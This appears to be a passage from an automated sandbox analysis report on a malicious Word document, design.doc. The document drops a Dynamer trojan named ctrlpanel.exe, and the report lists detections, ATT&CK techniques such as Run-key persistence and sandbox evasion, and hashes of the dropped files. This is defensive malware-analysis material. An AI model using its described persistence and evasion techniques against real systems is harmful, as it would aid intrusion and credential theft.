          Source: C:\Users\Public\ctrlpanel.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\office\15.0.0.0__71e9bce111e9429c\OFFICE.DLL VolumeInformationJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Vbe.Interop\15.0.0.0__71e9bce111e9429c\Microsoft.Vbe.Interop.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Vbe.Interop\15.0.0.0__71e9bce111e9429c\Microsoft.Vbe.Interop.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 5.0.ctrlpanel.exe.490000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.1690796909.0000000000492000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4054412499.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: C:\Users\Public\ctrlpanel.exe, type: DROPPED

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 5.0.ctrlpanel.exe.490000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.1690796909.0000000000492000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4054412499.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: C:\Users\Public\ctrlpanel.exe, type: DROPPED
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information12
          Scripting
          Valid Accounts3
          Exploitation for Client Execution
          12
          Scripting
          1
          Process Injection
          111
          Masquerading
          OS Credential Dumping1
          Security Software Discovery
          Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          Registry Run Keys / Startup Folder
          1
          Registry Run Keys / Startup Folder
          1
          Disable or Modify Tools
          LSASS Memory1
          Query Registry
          Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAt1
          DLL Side-Loading
          1
          DLL Side-Loading
          31
          Virtualization/Sandbox Evasion
          Security Account Manager1
          Process Discovery
          SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          Extra Window Memory Injection
          1
          Process Injection
          NTDS31
          Virtualization/Sandbox Evasion
          Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Rundll32
          LSA Secrets1
          Application Window Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading
          Cached Domain Credentials1
          File and Directory Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Extra Window Memory Injection
          DCSync13
          System Information Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          design.doc74%ReversingLabsDocument-Word.Trojan.Valyria
          design.doc100%AviraW2000M/Agent.71425518
          design.doc100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\Public\ctrlpanel.exe100%Joe Sandbox ML
          C:\Users\Public\ctrlpanel.exe65%ReversingLabsWin32.Trojan.Dynamer
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://crl.v0%URL Reputationsafe
          No contacted domains info
          NameSourceMaliciousAntivirus DetectionReputation
          http://crl.vctrlpanel.exe, 00000005.00000002.4062919397.000000001B7D0000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          No contacted IP infos
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1438684
          Start date and time:2024-05-09 01:47:20 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 9m 13s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:defaultwindowsofficecookbook.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Run name:Potential for more IOCs and behavior
          Number of analysed new started processes analysed:14
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • GSI enabled (VBA)
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:design.doc
          Detection:MAL
          Classification:mal100.troj.expl.winDOC@7/504@0/0
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 97%
          • Number of executed functions: 30
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .doc
          • Found Word or Excel or PowerPoint or XPS Viewer
          • Found warning dialog
          • Click Ok
          • Attach to Office via COM
          • Scroll down
          • Close Viewer
          • Override analysis time to 73297.9301 for current running targets taking high CPU consumption
          • Override analysis time to 146595.8602 for current running targets taking high CPU consumption
          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 52.109.8.89, 52.113.194.132, 72.247.100.147, 52.109.20.47, 52.168.117.174, 52.109.2.121, 52.109.2.127, 52.109.0.152, 52.109.2.117, 23.43.51.48, 23.43.51.50, 96.7.128.52, 96.7.128.82, 20.189.173.24, 52.109.0.140
          • Excluded domains from analysis (whitelisted): binaries.templates.cdn.office.net.edgesuite.net, odc.officeapps.live.com, slscr.update.microsoft.com, prod-wus-resolver.naturallanguageeditorservice.osi.office.net.akadns.net, templatesmetadata.office.net.edgekey.net, cus-config.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, osiprod-wus-buff-azsc-000.westus.cloudapp.azure.com, a1847.dscg2.akamai.net, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, wus-azsc-000.roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, us2.roaming1.live.com.akadns.net, ctldl.windowsupdate.com, prod-na.naturallanguageeditorservice.osi.office.net.akadns.net, osiprod-scus-bronze-azsc-000
          • Execution Graph export aborted for target ctrlpanel.exe, PID 7472 because it is empty
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtCreateFile calls found.
          • Report size getting too big, too many NtEnumerateKey calls found.
          • Report size getting too big, too many NtOpenFile calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryAttributesFile calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.
          • Report size getting too big, too many NtSetValueKey calls found.
          • VT rate limit hit for: design.doc
          TimeTypeDescription
          00:48:17AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Ctrlpanel c:\Users\Public
          01:48:31API Interceptor564716x Sleep call for process: ctrlpanel.exe modified
          No context
          No context
          No context
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          C:\Users\Public\ctrlpanel.exe#U0441#U0443#U043f#U0440#U043e#U0432#U0456#U0434#U043d#U0430.docGet hashmaliciousDynamerBrowse
            #U0441#U0443#U043f#U0440#U043e#U0432#U0456#U0434#U043d#U0430.docGet hashmaliciousDynamerBrowse
              WZG7C5nxQz.docmGet hashmaliciousDynamerBrowse
                WZG7C5nxQz.docmGet hashmaliciousDynamerBrowse
                  3pGxYMbJaA.docGet hashmaliciousDynamerBrowse
                    3pGxYMbJaA.docGet hashmaliciousDynamerBrowse
                      0001.docGet hashmaliciousDynamerBrowse
                        438 0001.docGet hashmaliciousDynamerBrowse
                          438 0001.docGet hashmaliciousDynamerBrowse
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):35328
                            Entropy (8bit):5.550458839870562
                            Encrypted:false
                            SSDEEP:768:lByDu+9jvTABQDGz90g9wlQlf5tNKkD+CSvYcapUdzY:ApsBiGZ0g9rf5tNhS2Od
                            MD5:40D2CCD570BD898CC31AF1CBFE5FB08E
                            SHA1:41D81D3275F8FE7BE023B9731519CDF359743818
                            SHA-256:10E720FBCF797A2F40FBAA214B3402DF14B7637404E5E91D7651BD13D28A69D8
                            SHA-512:0753EEC8F21C4681559B82327C93098D2D74732DF05D2304A8428DC7AF0FF13D49079EACD0DC29D9B32BA5E5095CAC6B9FA62A82F77E3CA3BB5986B64FE9195D
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_Dynamer, Description: Yara detected Dynamer, Source: C:\Users\Public\ctrlpanel.exe, Author: Joe Security
                            Antivirus:
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 65%
                            Joe Sandbox View:
                            • Filename: #U0441#U0443#U043f#U0440#U043e#U0432#U0456#U0434#U043d#U0430.doc, Detection: malicious, Browse
                            • Filename: #U0441#U0443#U043f#U0440#U043e#U0432#U0456#U0434#U043d#U0430.doc, Detection: malicious, Browse
                            • Filename: WZG7C5nxQz.docm, Detection: malicious, Browse
                            • Filename: WZG7C5nxQz.docm, Detection: malicious, Browse
                            • Filename: 3pGxYMbJaA.doc, Detection: malicious, Browse
                            • Filename: 3pGxYMbJaA.doc, Detection: malicious, Browse
                            • Filename: 0001.doc, Detection: malicious, Browse
                            • Filename: 438 0001.doc, Detection: malicious, Browse
                            • Filename: 438 0001.doc, Detection: malicious, Browse
                            Reputation:moderate, very likely benign file
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......U.................4...R......~R... ...`....@.. ....................................@.................................,R..O........L...........................`............................................... ............... ..H............text....2... ...4.................. ..`.sdata..8....`.......8..............@....rsrc....L.......N...:..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):520156
                            Entropy (8bit):4.907666742859367
                            Encrypted:false
                            SSDEEP:3072:9omubOSb3F2Fq9VMjNYof+pmpnGDubTxZO7aYb6f5780K2:+bOq3OjNymtGyT
                            MD5:036628E3E3F0728DAA7D53AC1B3EF8CC
                            SHA1:65327D9039335E1BAF9E14639AE355195766C9EC
                            SHA-256:2CAEC4D00BD356241B8B405B1B74386C677D501A7A23CE6EF916EAF912541544
                            SHA-512:C6524E4C732E1827B4FA8DA07DFF92F3024E15822578C6945B8A076498A85FF0D0C933E01F2AF98BA90A3E6A24DAB1601C07BE9D8D7193F4FB48A8E63FA75821
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:{"MajorVersion":4,"MinorVersion":39,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"ADLaM Display","fam":[],"sf":[{"c":[536870913,0],"dn":"ADLaM Display Regular","fs":140072,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"ADLaM Display"}],"gn":"ADLaM Display","id":"31965479471","p":[2,1,0,0,0,0,0,0,0,0],"sub":[],"t":"ttf","u":[2147491951,1107296330,0,0],"v":131072,"w":26215680}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":9830
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_39RegularVersion 4.39;O365
                            Category:dropped
                            Size (bytes):767532
                            Entropy (8bit):6.559103097590493
                            Encrypted:false
                            SSDEEP:12288:zn84XUdLDs51UJQSOf9VvLXHyheIQ47gEFGHtAgk3+/yLQ/zlm1kjFKy6Nyjbqq+:j8XNDs5+ivOXgm1kYvyz2
                            MD5:1BE236301B686323302632C0EACCFD6F
                            SHA1:7EF18B642DBFA9FB6E8AFABACB50F6CA6BD73BB4
                            SHA-256:90200D640623BFB0518B18D72C3F9828BC6EDA63EAB2DA90FBC27A08AAD165D7
                            SHA-512:BA6763BDB0C19103E417D808939739EF61FC15C7C4E7A8D10BB0120DC461D028054FF20A54BCB9A98FA9702B412D14CDC0270F2147F6C3FF5CB22A711934F276
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:........... OS/29....(...`cmap.s.(.......pglyf..&?...\....head2'.........6hheaE.@r.......$hmtxr..........0loca.+.....(...4maxp........... name.X+.........post...<....... .........Z.9_.<...........<........$....Aa...................Q....Aa....Aa.........................~...................................................3..............................MS .@.......(...Q................. ...........d...........0...J.......8.......>..........+a..#...,................................................/...K.......z...............N......*...!...-...+........z.......h..%^..3...&j..+...+%..'R..+..."....................l......$A...,.......g...&...=.......X..&........*......&....B..(B...............#.......j...............+...P...5...@...)..........#...)Q...............*...{.. ....?..'...#....N...7......<...;>.............. ]...........5......#....s.......$.......$.......^..................+...>....H.......%...7.......6.......O...V...........K......"........c...N......!...............$...&...*p..
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):2278
                            Entropy (8bit):3.8403440482899036
                            Encrypted:false
                            SSDEEP:48:uiTrlKxsxxiExl9Il8ucDHp6SV7B7WCdnB3q/CLd1rc:vhYSHp6SVpWEnB3qqs
                            MD5:2D2DB45B7CB22A6F5785EFC328ABEA62
                            SHA1:F374395D5E39E26703DA6DEB3006E95845C58214
                            SHA-256:AF1AC817ED601B34504FEAD1086F3DDD1073CF09BB6B9866440053A4D17BD440
                            SHA-512:1009A0BA7EBDF9DCA2C9317A63538A0F60E7467FF25F6AE40911773CD308B540EC98421086F553B2F86B769D92BA2FB6025546425F4C7F341C92CE65B51F1392
                            Malicious:false
                            Reputation:low
                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.O.r.N.j.6.q.h.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.6.w.v.t.u.K.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):4542
                            Entropy (8bit):4.000755775229554
                            Encrypted:false
                            SSDEEP:96:7YSH9l4x9vK+9ocaeo1sMTWiyWJWI/RFhrUglTFJXtb0:7Dl4xI+9oReqbeWYemuTTB0
                            MD5:1127FECFFA9F2F38DE79388596519FB2
                            SHA1:390F9FCFA8113CD20EC87E9DA202189EC547F964
                            SHA-256:068F6739FA383B5B93C6FDF45BDF6AB3DC42AF2F690307456ABF8EE3A10E8079
                            SHA-512:1760FFF9755524E0B46A58BBE4C3643E836BB01D72D0E53AF0DBCD61319A7A47C4E53230DCFCCD95631D895B46A6C9C71904F8D87296E6CABA321EC846C90B8D
                            Malicious:false
                            Reputation:low
                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".3.l.z.M.d.a.K.h.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.6.w.v.t.u.K.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):262144
                            Entropy (8bit):4.694361835732815
                            Encrypted:false
                            SSDEEP:6144:NXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:IpSq5
                            MD5:7D7A2B5C93EDA5D651AAACF6FACB6AF3
                            SHA1:6B596FDCA0E623FD06594D2747B6812C4EE8C6DD
                            SHA-256:78FB6BB08F89F7BE0B6E89F5E3A5E5E8C58953A28133C9310EF1A1FC0C755999
                            SHA-512:18D8AB57BCFAEB1C31BF4919670BDD2F0E755E5E27BFA5DDBAC1AB6E738679E4FA4A164AC49139E189392292D0CF8CF846040928FD447B61B0BCA03CA21F7F87
                            Malicious:false
                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):262144
                            Entropy (8bit):4.694361835732815
                            Encrypted:false
                            SSDEEP:6144:NXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:IpSq5
                            MD5:7D7A2B5C93EDA5D651AAACF6FACB6AF3
                            SHA1:6B596FDCA0E623FD06594D2747B6812C4EE8C6DD
                            SHA-256:78FB6BB08F89F7BE0B6E89F5E3A5E5E8C58953A28133C9310EF1A1FC0C755999
                            SHA-512:18D8AB57BCFAEB1C31BF4919670BDD2F0E755E5E27BFA5DDBAC1AB6E738679E4FA4A164AC49139E189392292D0CF8CF846040928FD447B61B0BCA03CA21F7F87
                            Malicious:false
                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.03351732319703582
                            Encrypted:false
                            SSDEEP:3:ol3lG:40
                            MD5:830FBF83999E052538EAF156AB6ECB17
                            SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                            SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                            SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.288511995009958
                            Encrypted:false
                            SSDEEP:3:QlHl3lldHzlblXllZrnlPlXllXa:wA
                            MD5:2AB4EFC5E58B2C45C502D4884BF74679
                            SHA1:2EF9FB1452ECB08DD858E43F931607DA241E29C5
                            SHA-256:A9DE0B40497AEF1418780367599DC605E4F75BF64746FECFC0E0A7A4413A15C7
                            SHA-512:C3824EEEDFB90DE361498CE8E119A4AD156BD551DEEEAB29578A0FFC1E78B0AF733F1DFEA5E8F5CE5AD92602869778A28FDA312553E60D0A0648C8F7B8F3CDBD
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.03351732319703582
                            Encrypted:false
                            SSDEEP:3:ol3lG:40
                            MD5:830FBF83999E052538EAF156AB6ECB17
                            SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                            SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                            SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.03351732319703582
                            Encrypted:false
                            SSDEEP:3:ol3lG:40
                            MD5:830FBF83999E052538EAF156AB6ECB17
                            SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                            SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                            SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
